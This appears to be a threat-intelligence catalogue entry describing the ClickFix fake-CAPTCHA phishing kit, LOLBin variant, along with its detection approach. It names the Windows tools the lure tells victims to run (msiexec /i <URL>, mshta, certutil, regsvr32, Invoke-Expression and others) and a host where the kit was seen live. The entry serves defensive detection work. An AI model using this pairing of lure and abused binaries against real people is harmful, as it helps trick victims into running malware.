Known malicious kitcriticalphishing
ClickFix FakeCAPTCHA — LOLBin variant (msiexec/mshta/wmic/etc.)
family: clickfix-fakecaptcha
Same fake-CAPTCHA flow as the PowerShell variant but the copied command is a non-PowerShell Windows LOLBin (msiexec /i <URL>, mshta, wmic, certutil, regsvr32, curl, iex, Invoke-Expression). First validated live on 00c29c34fd.nxcli.io from threatfox's IClickFix-tagged feed (scan 52b189eb / 2f465516 / f6c071f8). Markup-tolerant string matchers (<b>R</b> / <b>V</b> / <b>Enter</b>) catch kits whose instruction text is HTML-formatted.
Fingerprint anchors
No JS-hash anchors (YARA-anchored kit).
Provenance
Added by: analyst
Added: 2026-05-27 10:49
YARA-anchored. Sister to the PowerShell rule under the same family slug.